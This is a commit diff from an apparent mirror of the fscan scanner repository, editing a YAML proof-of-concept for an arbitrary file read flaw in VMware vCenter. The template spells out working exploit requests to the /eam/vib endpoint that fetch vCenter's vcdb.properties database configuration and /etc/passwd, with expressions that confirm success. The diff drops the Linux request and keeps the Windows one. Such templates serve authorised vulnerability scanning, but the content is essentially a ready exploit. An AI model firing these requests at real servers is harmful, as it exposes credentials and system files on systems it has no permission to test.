mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 05:01:53 +08:00
加入 404星链
This commit is contained in:
@@ -1,17 +1,10 @@
|
||||
name: poc-yaml-vmware-vcenter-arbitrary-file-read
|
||||
groups:
|
||||
win:
|
||||
- method: GET
|
||||
path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"org.postgresql.Driver")
|
||||
linux:
|
||||
- method: GET
|
||||
path: /eam/vib?id=/etc/passwd
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
rules:
|
||||
- method: GET
|
||||
path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"org.postgresql.Driver")
|
||||
detail:
|
||||
author: MrP01ntSun(https://github.com/MrPointSun)
|
||||
links:
|
||||
|
||||
Reference in New Issue
Block a user